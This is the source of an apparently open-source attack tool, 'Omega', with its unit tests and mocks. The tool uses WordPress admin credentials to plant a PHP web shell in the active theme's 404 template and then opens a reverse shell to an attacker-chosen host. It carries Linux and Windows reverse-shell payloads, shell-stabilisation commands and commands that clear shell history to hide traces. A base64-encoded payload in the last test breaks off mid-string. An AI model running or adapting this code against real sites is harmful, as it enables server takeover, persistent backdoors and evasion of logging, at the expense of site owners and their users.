import requests
import json
from bs4 import BeautifulSoup
from omega_wp.config import DEFAULT_HEADERS


class LoginService:
    def __init__(self, wp_url: str):
        self.wp_url = wp_url
    
    def is_xmlrpc_enabled(self):
        response = requests.post(f'{self.wp_url}/xmlrpc.php', headers=DEFAULT_HEADERS)

        return response.ok

    def check_admin_login(self, username: str, password: str):
        payload = (
            f'<?xml version="1.0" encoding="UTF-8"?>'
            f'<methodCall> '
            f'<methodName>wp.getUsersBlogs</methodName>'
            f'<params>'
            f'<param><value>{username}</value></param>'
            f'<param><value>{password}</value></param>'
            f'</params>'
            f'</methodCall>'
        )
        login_error_str = 'Incorrect username or password.'

        # Check login is correct
        response = requests.post(f'{self.wp_url}/xmlrpc.php', data=payload, headers=DEFAULT_HEADERS)
        if (login_error_str in response.text):
            raise Exception('Wrong credentials')

        # Check if the user is admin
        soup = BeautifulSoup(response.text, 'xml')
        response_text = json.loads(
            str(soup.findAll(text=True)).replace('\\n', '').replace("'", '"'))
        is_admin = response_text[response_text.index('isAdmin') + 1] == '1'

        if(not is_admin):
            raise Exception('User is not admin')

    def get_wp_admin_session(self, username: str, password: str) -> requests.Session:
        login_data = {
            'log': username,
            'pwd': password,
            'rememberme': 'forever',
            'redirect_to': f'{self.wp_url}/wp-admin',
            'redirect_to_automatic': '1'
        }
        wp_admin_session = requests.Session()
        response = wp_admin_session.post(f'{self.wp_url}/wp-login.php', data=login_data, headers=DEFAULT_HEADERS)

        if(not response.ok or 'login_error' in response.text):
            raise Exception('Error  trying to login')

        return wp_admin_session



from pwnlib import useragents


VERSION = '2.5'

DEFAULT_HEADERS = {
    'User-Agent': useragents.random()
}

SHELL_STABILIZATION_METHODS = {
    'python': {
        'bash': """python -c 'import pty; pty.spawn("/bin/bash")'""",
        'sh': """python -c 'import pty; pty.spawn("/bin/bash")'"""
    },
    'python3': {
        'bash': """python3 -c 'import pty; pty.spawn("/bin/bash")'""",
        'sh': """python3 -c 'import pty; pty.spawn("/bin/sh")'"""
    },
    'script': {
        'bash': 'script -qc /bin/bash /dev/null',
        'sh': 'script -qc /bin/sh /dev/null'
    }
}

# Code from https://github.com/ivan-sincek/php-reverse-shell, modified a bit to take only the windows part
SHELL_CODE = """
class Shell {
    private $addr  = null;
    private $port  = null;
    private $descriptorspec = array(
        0 => array('pipe', 'r'), 
        1 => array('pipe', 'w'), 
        2 => array('pipe', 'w')  
    );
    private $buffer  = 1024;    
    private $clen    = 0;       
    private $error   = false;   
    public function __construct($addr, $port) {
        $this->addr = $addr;
        $this->port = $port;
    }
    private function daemonize() {
        $exit = false;
        if (!function_exists('pcntl_fork')) { }
        else if (($pid = @pcntl_fork()) < 0) { } 
        else if ($pid > 0) { $exit = true; } 
        else if (posix_setsid() < 0) { }
        return $exit;
    }
    private function settings() {
        @error_reporting(0);
        @set_time_limit(0); 
        @umask(0); 
    }
    private function dump($data) {
        $data = str_replace('<', '&lt;', $data);
        $data = str_replace('>', '&gt;', $data);
        echo $data;
    }
    private function read($stream, $name, $buffer) {
        if (($data = @fread($stream, $buffer)) === false) { 
            $this->error = true;
        }
        return $data;
    }
    private function write($stream, $name, $data) {
        if (($bytes = @fwrite($stream, $data)) === false) { 
            $this->error = true;
        }
        return $bytes;
    }
    private function rw($input, $output, $iname, $oname) {
        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
            if ($oname === 'STDIN') { $this->clen += strlen($data); } 
            $this->dump($data); 
        }
    }
    private function brw($input, $output, $iname, $oname) {
        $fstat = fstat($input);
        $size = $fstat['size'];
        if ($iname === 'STDOUT' && $this->clen) {
            while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
                $this->clen -= $bytes;
                $size -= $bytes;
            }
        }
        while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
            $size -= $bytes;
            $this->dump($data); 
        }
    }
    public function run() {
        if (!$this->daemonize()) {
            $this->settings();
            $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
            if (!$socket) { } 
            else {
                stream_set_blocking($socket, false); 
                $process = @proc_open('cmd.exe', $this->descriptorspec, $pipes, null, null);
                if (!$process) {
                } else {
                    foreach ($pipes as $pipe) {
                        stream_set_blocking($pipe, false); 
                    }
                    $status = proc_get_status($process);
                    do {
                        $status = proc_get_status($process);
                        if (feof($socket)) { 
                            break;
                        } else if (feof($pipes[1]) || !$status['running']) {                 
                            break; 
                        }                                                                    
                        $streams = array(
                            'read'   => array($socket, $pipes[1], $pipes[2]), 
                            'write'  => null,
                            'except' => null
                        );
                        $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); 
                        if ($num_changed_streams === false) { } 
                        else if ($num_changed_streams > 0) {
                            if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } 
                            if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } 
                            if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); }
                        }
                    } while (!$this->error);

                    foreach ($pipes as $pipe) {
                        fclose($pipe);
                    }
                    proc_close($process);
                }
                fclose($socket);
            }
        }
    }
}
echo '<pre>';
$sh = new Shell('LHOST', LPORT);
$sh->run();
unset($sh);
echo '</pre>';
"""



import argparse
from omega_wp.config import VERSION


class ParametersParserService:
	def __init__(self):
		self.parser = argparse.ArgumentParser(description='Provides a reverse shell (stabilized if possible) to a Wordpress host. You need admin credentials!')
		self.parser.add_argument('-v', '--version', action='version', version='%(prog)s version ' + VERSION)
		self.parser.add_argument('--no-pty', action='store_true', help='if this flag is set, no shell stabilization is perform')
		self.parser.add_argument('-u', '--wp-url', type=str, help='the target Wordpress url', required=True)
		self.parser.add_argument('-l', '--username', type=str, help='Wordpress admin user to use for login', required=True)
		self.parser.add_argument('-p', '--password', type=str, help='Wordpress admin password to use for login', required=True)
		self.parser.add_argument('-H', '--lhost', type=str, help='the ip where the reverse shell should connect to', required=True)
		self.parser.add_argument('-P', '--lport', type=int, help='the port used to listen for the reverse shell (Default: 8080)', default=8080)

	def parse_params(self) -> argparse.Namespace:
		return self.parser.parse_args()



import requests
import base64
from omega_wp.config import SHELL_STABILIZATION_METHODS, SHELL_CODE, DEFAULT_HEADERS
from pwnlib.tubes.listen import listen


class ShellService:
    def __init__(self, web_shell_url: str, lhost: str, lport: int):
        self.web_shell_url = web_shell_url
        self.lhost = lhost
        self.lport = lport

    def prepare_listener(self) -> listen:
        listener = listen(self.lport)

        return listener

    def execute_rev_shell(self):
        try:
            requests.get(self.get_shell_code_url_with_payload(), headers=DEFAULT_HEADERS, timeout=2)
        except requests.exceptions.ReadTimeout:
            pass

    def get_shell_code_url_with_payload(self) -> str:
        if(self.is_linux()):
            shell_code = f'$sock=fsockopen("{self.lhost}",{self.lport});exec("/bin/sh -i <&3 >&3 2>&3");'
            payload = requests.utils.quote(f"php -r '{shell_code}'")
            return f'{self.web_shell_url}?omega={payload}'
        else:
            plain_shell_code = SHELL_CODE.replace('LHOST', f'{self.lhost}').replace('LPORT', f'{self.lport}')
            payload = requests.utils.quote(base64.b64encode(plain_shell_code.encode()).decode())
            return f'{self.web_shell_url}?omega={payload}&php'

    def is_linux(self) -> bool:
        os_check_code = requests.utils.quote(base64.b64encode(b"print('OMEGA_HOST_OS = '.PHP_OS);").decode())
        response = requests.get(f'{self.web_shell_url}?omega={os_check_code}&php', headers=DEFAULT_HEADERS)
        return 'OMEGA_HOST_OS = LINUX' in response.content.decode().upper()

    def is_rev_shell(self, shell: listen) -> bool:
        data_received = shell.recv(timeout=0.5)
        shell.unrecv(data_received)

        if (not b'$' in data_received and not b'Windows' in data_received):
            return False
        return True

    def upgrade_shell(self, shell: listen):
        shell.sendline(b'export HISTFILE=/dev/null') # Avoid history
        # Get pty
        shell.sendline(f'{self.find_pty_spawn_vector(shell)}; exit'.encode())

        shell.recv(timeout = None) # Wait for pty to spawn
        shell.sendline(b'export HISTFILE=/dev/null')
        shell.sendline(b'stty rows 38 columns 116')
        shell.sendline(b""" alias ls='ls --color=auto'""")
        shell.sendline(b'export TERM=xterm')
        shell.sendline(b'history -c')
        shell.clean(timeout=1)
    
    def find_pty_spawn_vector(self, shell: listen) -> str:
        shell.clean()

        for binary in SHELL_STABILIZATION_METHODS:
            shell.sendline(f'which {binary}'.encode())
            result = shell.recvline(timeout=2).decode()
            if(binary in result and 'not found' not in result):
                for shell_binary in SHELL_STABILIZATION_METHODS[binary]:
                    shell.sendline(f'which {shell_binary}'.encode())
                    result = shell.recvline(timeout=2).decode()
                    if(shell_binary in result and 'not found' not in result):
                        return SHELL_STABILIZATION_METHODS[binary][shell_binary]
            shell.clean()
        
        raise Exception('No pty spawn vector found')



from .LoginService import LoginService
from .PayloadService import PayloadService
from .ShellService import ShellService
from .ParametersParserService import ParametersParserService
from .TerminalService import TerminalService



import unittest, responses, requests
from tests import mocks
from omega_wp.services import LoginService


class LoginServiceTest(unittest.TestCase):
    wp_url = 'http://fancy-wordpress-site.com'

    @responses.activate
    def test_xmlrpc_is_active(self):
        responses.add(**{
            'method'         : responses.POST,
            'url'            : f'{self.wp_url}/xmlrpc.php',
            'status'         : 200
        })

        login_service = LoginService(self.wp_url)
        result = login_service.is_xmlrpc_enabled()

        self.assertTrue(result)
    
    @responses.activate
    def test_xmlrpc_is_disabled(self):
        responses.add(**{
            'method'         : responses.POST,
            'url'            : f'{self.wp_url}/xmlrpc.php',
            'status'         : 404
        })

        login_service = LoginService(self.wp_url)
        result = login_service.is_xmlrpc_enabled()

        self.assertFalse(result)
    
    @responses.activate
    def test_check_admin_login_success(self):
        responses.add(**{
            'method'         : responses.POST,
            'url'            : f'{self.wp_url}/xmlrpc.php',
            'status'         : 200,
            'body'           : mocks.xmlrpc_right_admin_credentials_response
        })

        login_service = LoginService(self.wp_url)
        login_service.check_admin_login('user', 'password')
    
    @responses.activate
    def test_check_admin_login_success_not_admin(self):
        responses.add(**{
            'method'         : responses.POST,
            'url'            : f'{self.wp_url}/xmlrpc.php',
            'status'         : 200,
            'body'           : mocks.xmlrpc_right_not_admin_credentials_response
        })

        login_service = LoginService(self.wp_url)
        self.assertRaises(Exception, login_service.check_admin_login, 'user', 'password')
    
    @responses.activate
    def test_check_admin_login_error(self):
        responses.add(**{
            'method'         : responses.POST,
            'url'            : f'{self.wp_url}/xmlrpc.php',
            'status'         : 200,
            'body'           : mocks.xmlrpc_wrong_credentials_response
        })

        login_service = LoginService(self.wp_url)
        self.assertRaises(Exception, login_service.check_admin_login, 'user', 'password')
    
    @responses.activate
    def test_get_wp_admin_session(self):
        responses.add(**{
            'method'         : responses.POST,
            'url'            : f'{self.wp_url}/wp-login.php',
            'status'         : 200
        })

        login_service = LoginService(self.wp_url)
        session = login_service.get_wp_admin_session('user', 'password')

        self.assertTrue(type(session) is requests.Session)


if __name__ == '__main__':
    unittest.main()



import unittest, sys
from argparse import Namespace
from io import StringIO
from omega_wp.services import ParametersParserService


class ParametersParserServiceTest(unittest.TestCase):
    def test_no_arguments_parse(self):
        sys.argv = ['./omega.py']
        parameterParserService = ParametersParserService()

        with unittest.mock.patch('sys.stderr', new=StringIO()) as fakeOutput:
            try:
                parameterParserService.parse_params()
            except SystemExit:
                self.assertTrue('error: the following arguments are required: -u/--wp-url, -l/--username, -p/--password, -H/--lhost' in fakeOutput.getvalue().strip())
    
    def test_arguments_parse(self):
        sys.argv = ['./omega.py', '-u', 'http://example', '-l', 'user', '-p', 'password', '--lhost', '127.0.0.1', '--lport', '8000']
        parameterParserService = ParametersParserService()

        with unittest.mock.patch('sys.stderr', new=StringIO()):
            try:
                params = parameterParserService.parse_params()
                self.assertEqual(params, Namespace(lhost='127.0.0.1', lport=8000, no_pty=False, password='password', username='user', wp_url='http://example'))
            except SystemExit:
                raise Exception('Wrong parameters!')
    
    def test_arguments_parse_default_port(self):
        sys.argv = ['./omega.py', '-u', 'http://example', '-l', 'user', '-p', 'password', '--lhost', '127.0.0.1']
        parameterParserService = ParametersParserService()

        with unittest.mock.patch('sys.stderr', new=StringIO()):
            try:
                params = parameterParserService.parse_params()
                self.assertEqual(params, Namespace(lhost='127.0.0.1', lport=8080, no_pty=False, password='password', username='user', wp_url='http://example'))
            except SystemExit:
                raise Exception('Wrong parameters!')
    
    def test_arguments_parse_error(self):
        sys.argv = ['./omega.py', '-u', 'http://example', '-l', 'user', '-p', 'password', '--lhost']
        parameterParserService = ParametersParserService()

        with unittest.mock.patch('sys.stderr', new=StringIO()) as fakeOutput:
            try:
                parameterParserService.parse_params()
            except SystemExit:
                self.assertTrue('error: argument -H/--lhost: expected one argument' in fakeOutput.getvalue().strip())


if __name__ == '__main__':
    unittest.main()



wp_url = 'http://fancy-wordpress-site.com'

xmlrpc_wrong_credentials_response = """
<methodResponse>
  <fault>
    <value>
      <struct>
        <member>
          <name>faultCode</name>
          <value><int>403</int></value>
        </member>
        <member>
          <name>faultString</name>
          <value><string>Incorrect username or password.</string></value>
        </member>
      </struct>
    </value>
  </fault>
</methodResponse>
"""

xmlrpc_right_admin_credentials_response = """
<methodResponse>
  <params>
    <param>
      <value>
      <array><data>
  <value><struct>
  <member><name>isAdmin</name><value><boolean>1</boolean></value></member>
  <member><name>url</name><value><string>http://fancy-wordpress-site.com/</string></value></member>
  <member><name>blogid</name><value><string>1</string></value></member>
  <member><name>blogName</name><value><string>Omega</string></value></member>
  <member><name>xmlrpc</name><value><string>http://fancy-wordpress-site.com/xmlrpc.php</string></value></member>
</struct></value>
</data></array>
      </value>
    </param>
  </params>
</methodResponse>
"""

xmlrpc_right_not_admin_credentials_response = """
<methodResponse>
  <params>
    <param>
      <value>
      <array><data>
  <value><struct>
  <member><name>isAdmin</name><value><boolean>0</boolean></value></member>
  <member><name>url</name><value><string>http://fancy-wordpress-site.com/</string></value></member>
  <member><name>blogid</name><value><string>1</string></value></member>
  <member><name>blogName</name><value><string>Omega</string></value></member>
  <member><name>xmlrpc</name><value><string>http://fancy-wordpress-site.com/xmlrpc.php</string></value></member>
</struct></value>
</data></array>
      </value>
    </param>
  </params>
</methodResponse>
"""

wordpress_themes_response = '<div class="theme active"><h2 class="theme-name" id="twentytwentyone-id">Fancy theme</h2></div>'

wordpress_theme_editor_response = """<form action="theme-editor.php" id="template" method="post" name="template">
<input id="nonce" name="nonce" type="hidden" value="12837987"/><input name="_wp_http_referer" type="hidden" value="/wp-admin/theme-editor.php?file=404.php&amp;theme=twentytwentyone"/> <div>
<label for="newcontent" id="theme-plugin-editor-label">Selected file content:</label>
<textarea aria-describedby="editor-keyboard-trap-help-1 editor-keyboard-trap-help-2 editor-keyboard-trap-help-3 editor-keyboard-trap-help-4" cols="70" id="newcontent" name="newcontent" rows="30">
&lt;?php
/**
 * The template for displaying 404 pages (not found)
 *
 * @link https://codex.wordpress.org/Creating_an_Error_404_Page
 *
 * @package WordPress
 * @subpackage Twenty_Twenty_One
 * @since Twenty Twenty-One 1.0
 */

get_header();
?&gt;

        &lt;header class="page-header alignwide"&gt;
                &lt;h1 class="page-title"&gt;&lt;?php esc_html_e( 'Nothing here', 'twentytwentyone' ); ?&gt;&lt;/h1&gt;
        &lt;/header&gt;&lt;!-- .page-header --&gt;

        &lt;div class="error-404 not-found default-max-width"&gt;
                &lt;div class="page-content"&gt;
                        &lt;p&gt;&lt;?php esc_html_e( 'It looks like nothing was found at this location. Maybe try a search?', 'twentytwentyone' ); ?&gt;&lt;/p&gt;
                        &lt;?php get_search_form(); ?&gt;
                &lt;/div&gt;&lt;!-- .page-content --&gt;
        &lt;/div&gt;&lt;!-- .error-404 --&gt;

&lt;?php
get_footer();
</textarea>
<input name="action" type="hidden" value="update"/>
<input name="file" type="hidden" value="404.php"/>
<input name="theme" type="hidden" value="twentytwentyone"/>
</div>
<div class="hide-if-no-js" id="documentation">
<label for="docs-list">Documentation:</label>
<select id="docs-list" name="docs-list"><option value="">Function Name…</option><option value="esc_html_e">esc_html_e()</option><option value="get_footer">get_footer()</option><option value="get_header">get_header()</option><option value="get_search_form">get_search_form()</option><option value="system">system()</option></select> <input class="button" disabled="" id="docs-lookup" onclick="if ( '' != jQuery('#docs-list').val() ) { window.open( 'https://api.wordpress.org/core/handbook/1.0/?function=' + escape( jQuery( '#docs-list' ).val() ) + '&amp;locale=en_US&amp;version=5.7.2&amp;redirect=true'); }" type="button" value="Look Up"/>
</div>
<div>
<div class="editor-notices">
</div>
<p class="submit">
<input class="button button-primary" id="submit" name="submit" type="submit" value="Update File"/> <span class="spinner"></span>
</p>
</div>
<script id="tmpl-wp-file-editor-notice" type="text/html">
                <div class="notice inline notice-{{ data.type || 'info' }} {{ data.alt ? 'notice-alt' : '' }} {{ data.dismissible ? 'is-dismissible' : '' }} {{ data.classes || '' }}">
                        <# if ( 'php_error' === data.code ) { #>
                                <p>
                                        Your PHP code changes were rolled back due to an error on line {{ data.line }} of file {{ data.file }}. Please fix and try saving again.       </p>
                                <pre>{{ data.message }}</pre>
                        <# } else if ( 'file_not_writable' === data.code ) { #>
                                <p>
                                        You need to make this file writable before you can save your changes. See <a href="https://wordpress.org/support/article/changing-file-permissions/">Changing File Permissions</a> for more information.                                </p>
                        <# } else { #>
                                <p>{{ data.message || data.code }}</p>

                                <# if ( 'lint_errors' === data.code ) { #>
                                        <p>
                                                <# var elementId = 'el-' + String( Math.random() ); #>
                                                <input id="{{ elementId }}"  type="checkbox">
                                                <label for="{{ elementId }}">Update anyway, even though it might break your site?</label>
                                        </p>
                                <# } #>
                        <# } #>
                        <# if ( data.dismissible ) { #>
                                <button type="button" class="notice-dismiss"><span class="screen-reader-text">Dismiss</span></button>
                        <# } #>
                </div>
        </script>
</form>"""


wordpress_os_detection_linux_response = """<html>OMEGA_HOST_OS = Linux</html>"""
wordpress_os_detection_windows_response = """<html>OMEGA_HOST_OS = WINT</html>"""



#!/usr/bin/env python3

import os, threading
from argparse import Namespace
from pwnlib.log import install_default_handler, getLogger
from pwnlib.tubes.listen import listen
from omega_wp.services import (
    LoginService,
    PayloadService,
    ShellService,
    ParametersParserService,
    TerminalService
)

# Init pwntools stuff and safe terminal conf
terminal_service = TerminalService()
install_default_handler()
log = getLogger('pwnlib')

def shell_handler(shell: listen):
    while shell.connected('recv'): pass
    shell.shutdown('send')

    # Restore terminal conf and exit
    terminal_service.restore_tty()

    log.setLevel(1)
    log.info(f'Closed connection to {shell.rhost} port {shell.rport}')
    os._exit(0)


def omega(args: Namespace):
    wp_url = args.wp_url.strip('/')
    username = args.username
    password = args.password
    lhost = args.lhost
    lport = args.lport
    no_pty = args.no_pty

    with log.progress('Trying to get an admin session...') as p:
        login_service = LoginService(wp_url)
        if(login_service.is_xmlrpc_enabled()):
            p.status('Looks like the site has xmlrpc enabled')
            login_service.check_admin_login(username, password)
        wp_admin_session = login_service.get_wp_admin_session(username, password)
        p.success('Got admin session!')

    with log.progress('Dropping payload in the current 404 template...') as p:
        payload_service = PayloadService(wp_url, wp_admin_session)
        web_shell_url = payload_service.drop_payload()
        p.success('Payload ready')

    with log.progress('Getting a reverse shell...') as p:
        shell_service = ShellService(web_shell_url, lhost, lport)
        shell = shell_service.prepare_listener()
        shell_service.execute_rev_shell()
        if (not shell_service.is_rev_shell(shell)):
            raise Exception('No shell received!')
        p.success('Got a shell!')
    
    if(not no_pty and shell_service.is_linux()):
        with log.progress('Trying to stabilize the shell...') as p:
            try:
                shell_service.upgrade_shell(shell)
                terminal_service.pty = True
                p.success('Shell stabilized!')
            except:
                p.failure('Shell stabilization not possible, a non pty shell will be provided')
                
    # Start shell handler to control the closing
    shell_handler_thread = threading.Thread(target=shell_handler, args=(shell,))
    shell_handler_thread.setDaemon(True)
    shell_handler_thread.start()
    
    # Start interactive mode
    log.info('Switching to interactive mode')
    log.setLevel('error')
    if(terminal_service.pty):
        terminal_service.set_raw_mode()
        shell.sendline(b'') # Make the prompt appear
    shell.interactive()

def main():
    print('Omega - From Wordpress admin to pty\n')

    parameterParserService = ParametersParserService()
    args = parameterParserService.parse_params()

    try:
        omega(args)
    except KeyboardInterrupt:
        log.failure('Interrupted')
    except Exception:
        log.failure('Attack failed!')

if __name__ == '__main__':
    main()



from requests import Session
from bs4 import BeautifulSoup
from omega_wp.config import DEFAULT_HEADERS


class PayloadService:
    def __init__(self, wp_url: str, wp_admin_session: Session):
        self.wp_url = wp_url
        self.wp_admin_session = wp_admin_session
        self.payload = "<?php if(isset($_GET['omega'])){ if(isset($_GET['php'])){ eval(base64_decode($_GET['omega'])); }else{ system($_GET['omega']); } }?>\n"

    def drop_payload(self) -> str:
        active_theme_name = self.get_theme_name()
        form_data = self.get_theme_404_template_form_data(active_theme_name)

        if(not self.is_payload_already_dropped(form_data['newcontent'])):
            form_data['newcontent'] = self.payload + form_data['newcontent']
            for key in form_data:
                form_data[key]

            response = self.wp_admin_session.post(f'{self.wp_url}/wp-admin/theme-editor.php', headers=DEFAULT_HEADERS, data=form_data)
            if(not response.ok):
                raise Exception('Error updating the template')

        return f'{self.wp_url}/wp-content/themes/{active_theme_name}/404.php'

    def get_theme_name(self) -> str:
        response = self.wp_admin_session.get(f'{self.wp_url}/wp-admin/themes.php', headers=DEFAULT_HEADERS)
        if(not response.ok):
            raise Exception('Error getting themes')
        soup = BeautifulSoup(response.text, 'lxml')

        active_theme_div = soup.find('div', attrs={'class': 'theme active'})
        active_theme_raw = active_theme_div.findChildren(
            'h2', attrs={'class': 'theme-name'})[0]
        active_theme_name = active_theme_raw.get('id').split('-')[0]

        return active_theme_name

    def get_theme_404_template_form_data(self, active_theme_name: str) -> dict:
        response = self.wp_admin_session.get(f'{self.wp_url}/wp-admin/theme-editor.php?file=404.php&theme={active_theme_name}', headers=DEFAULT_HEADERS)
        if(not response.ok):
            raise Exception('Error getting theme data')
        soup = BeautifulSoup(response.text, 'lxml')

        html_form = soup.find('form', attrs={'id': 'template'})
        template_code = html_form.findChildren('textarea')[0].contents[0]
        hidden_inputs = html_form.findChildren(
            'input', attrs={'type': 'hidden'})

        form_data = {}
        form_data['newcontent'] = template_code
        form_data['docs-list'] = ''
        for hidden_input in hidden_inputs:
            form_data[hidden_input.get('name')] = hidden_input.get('value')

        return form_data

    def is_payload_already_dropped(self, template_code: str) -> bool:
        return self.payload in template_code



from setuptools import setup, find_packages

setup(
    name='omega_wp',
    version='2.5.post4',
    license='GPL-2.0',
    description='From Wordpress admin to pty automatically!',
    author='Ángel Heredia',
    packages=find_packages(),
    url='https://github.com/anthares101/omega',
    keywords='windows macos linux shell wordpress reverse-shell tool hacking tty pty cybersecurity reverse pwntools hacktoberfest kali',
    python_requires='>=3',
    install_requires=[
        'pwntools',
        'requests',
        'bs4',
        'lxml'
    ],
    extras_require={
        'dev': [
            'responses',
        ]
    },
    entry_points='''
        [console_scripts]
        omega=omega_wp.__main__:main
    ''',
)



import unittest, responses
from pwnlib.tubes.remote import remote
from omega_wp.services import ShellService
from omega_wp.config import SHELL_STABILIZATION_METHODS
from tests import mocks


class ShellServiceTest(unittest.TestCase):
    web_shell_url = 'http://fancy-wordpress-site.com/funny_file.php'
    lhost = '127.0.0.1'
    lport = 8080
    
    def test_prepare_listener(self):
        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
        listener = shell_service.prepare_listener()
        remote(self.lhost, self.lport)
        
        self.assertTrue(listener.connected())
        listener.close()
    
    @responses.activate
    def test_execute_rev_shell(self):
        responses.add(**{
            'method'         : responses.GET,
            'url'            : f'{self.web_shell_url}',
            'status'         : 200
        })
        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
        shell_service.execute_rev_shell()
    
    @responses.activate
    def test_get_shell_code_url_with_payload_linux(self):
        responses.add(**{
            'method'         : responses.GET,
            'url'            : f'{self.web_shell_url}',
            'status'         : 200,
            'body'           : mocks.wordpress_os_detection_linux_response
        })
        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
        self.assertEqual(shell_service.get_shell_code_url_with_payload(), 'http://fancy-wordpress-site.com/funny_file.php?omega=php%20-r%20%27%24sock%3Dfsockopen%28%22127.0.0.1%22%2C8080%29%3Bexec%28%22/bin/sh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27')
    
    @responses.activate
    def test_get_shell_code_url_with_payload_windows(self):
        responses.add(**{
            'method'         : responses.GET,
            'url'            : f'{self.web_shell_url}',
            'status'         : 200,
            'body'           : mocks.wordpress_os_detection_windows_response
        })
        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
        self.assertEqual(shell_service.get_shell_code_url_with_payload(), 'http://fancy-wordpress-site.com/funny_file.php?omega=CmNsYXNzIFNoZWxsIHsKICAgIHByaXZhdGUgJGFkZHIgID0gbnVsbDsKICAgIHByaXZhdGUgJHBvcnQgID0gbnVsbDsKICAgIHByaXZhdGUgJGRlc2NyaXB0b3JzcGVjID0gYXJyYXkoCiAgICAgICAgMCA9PiBhcnJheSgncGlwZScsICdyJyksIAogICAgICAgIDEgPT4gYXJyYXkoJ3BpcGUnLCAndycpLCAKICAgICAgICAyID0%2BIGFycmF5KCdwaXBlJywgJ3cnKSAgCiAgICApOwogICAgcHJpdmF0ZSAkYnVmZmVyICA9IDEwMjQ7ICAgIAogICAgcHJpdmF0ZSAkY2xlbiAgICA9IDA7ICAgICAgIAogICAgcHJpdmF0ZSAkZXJyb3IgICA9IGZhbHNlOyAgIAogICAgcHVibGljIGZ1bmN0aW9uIF9fY29uc3RydWN0KCRhZGRyLCAkcG9ydCkgewogICAgICAgICR0aGlzLT5hZGRyID0gJGFkZHI7CiAgICAgICAgJHRoaXMtPnBvcnQgPSAkcG9ydDsKICAgIH0KICAgIHByaXZhdGUgZnVuY3Rpb24gZGFlbW9uaXplKCkgewogICAgICAgICRleGl0ID0gZmFsc2U7CiAgICAgICAgaWYgKCFmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSkgeyB9CiAgICAgICAgZWxzZSBpZiAoKCRwaWQgPSBAcGNudGxfZm9yaygpKSA8IDApIHsgfSAKICAgICAgICBlbHNlIGlmICgkcGlkID4gMCkgeyAkZXhpdCA9IHRydWU7IH0gCiAgICAgICAgZWxzZSBpZiAocG9zaXhfc2V0c2lkKCkgPCAwKSB7IH0KICAgICAgICByZXR1cm4gJGV4aXQ7CiAgICB9CiAgICBwcml2YXRlIGZ1bmN0aW9uIHNldHRpbmdzKCkgewogICAgICAgIEBlcnJvcl9yZXBvcnRpbmcoMCk7CiAgICAgICAgQHNldF90aW1lX2xpbWl0KDApOyAKICAgICAgICBAdW1hc2soMCk7IAogICAgfQogICAgcHJpdmF0ZSBmdW5jdGlvbiBkdW1wKCRkYXRhKSB7CiAgICAgICAgJGRhdGEgPSBzdHJfcmVwbGFjZSgnPCcsICcmbHQ7JywgJGRhdGEpOwogICAgICAgICRkYXRhID0gc3RyX3JlcGxhY2UoJz4nLCAnJmd0OycsICRkYXRhKTsKICAgICAgICBlY2hvICRkYXRhOwogICAgfQogICAgcHJpdmF0ZSBmdW5jdGlvbiByZWFkKCRzdHJlYW0sICRuYW1lLCAkYnVmZmVyKSB7CiAgICAgICAgaWYgKCgkZGF0YSA9IEBmcmVhZCgkc3RyZWFtLCAkYnVmZmVyKSkgPT09IGZhbHNlKSB7IAogICAgICAgICAgICAkdGhpcy0%2BZXJyb3IgPSB0cnVlOwogICAgICAgIH0KICAgICAgICByZXR1cm4gJGRhdGE7CiAgICB9CiAgICBwcml2YXRlIGZ1bmN0aW9uIHdyaXRlKCRzdHJlYW0sICRuYW1lLCAkZGF0YSkgewogICAgICAgIGlmICgoJGJ5dGVzID0gQGZ3cml0ZSgkc3RyZWFtLCAkZGF0YSkpID09PSBmYWxzZSkgeyAKICAgICAgICAgICAgJHRoaXMtPmVycm9yID0gdHJ1ZTsKICAgICAgICB9CiAgICAgICAgcmV0dXJuICRieXRlczsKICAgIH0KICAgIHByaXZhdGUgZnVuY3Rpb24gcncoJGlucHV0LCAkb3V0cHV0LCAkaW5hbWUsICRvbmFtZSkgewogICAgICAgIHdoaWxlICgoJGRhdGEgPSAkdGhpcy0%2BcmVhZCgkaW5wdXQsICRpbmFtZSwgJHRoaXMtPmJ1ZmZlcikpICYmICR0aGlzLT53cml0ZSgkb3V0cHV0LCAkb25hbWUsICRkYXRhKSkgewogICAgICAgICAgICBpZiAoJG9uYW1lID09PSAnU1RESU4nKSB7ICR0aGlzLT5jbGVuICs9IHN0cmxlbigkZGF0YSk7IH0gCiAgICAgICAgICAgICR0aGlzLT5kdW1wKCRkYXRhKTsgCiAgICAgICAgfQogICAgfQogICAgcHJpdmF0ZSBmdW5jdGlvbiBicncoJGlucHV0LCAkb3V0cHV0LCAkaW5hbWUsICRvbmFtZSkgewogICAgICAgICRmc3RhdCA9IGZzdGF0KCRpbnB1dCk7CiAgICAgICAgJHNpemUgPSAkZnN0YXRbJ3NpemUnXTsKICAgICAgICBpZiAoJGluYW1lID09PSAnU1RET1VUJyAmJiAkdGhpcy0%2BY2xlbikgewogICAgICAgICAgICB3aGlsZSAoJHRoaXMtPmNsZW4gPiAwICYmICgkYnl0ZXMgPSAkdGhpcy0%2BY2xlbiA%2BPSAkdGhpcy0%2BYnVmZmVyID8gJHRoaXMtPmJ1ZmZlciA6ICR0aGlzLT5jbGVuKSAmJiAkdGhpcy0%2BcmVhZCgkaW5wdXQsICRpbmFtZSwgJGJ5dGVzKSkgewogICAgICAgICAgICAgICAgJHRoaXMtPmNsZW4gLT0gJGJ5dGVzOwogICAgICAgICAgICAgICAgJHNpemUgLT0gJGJ5dGVzO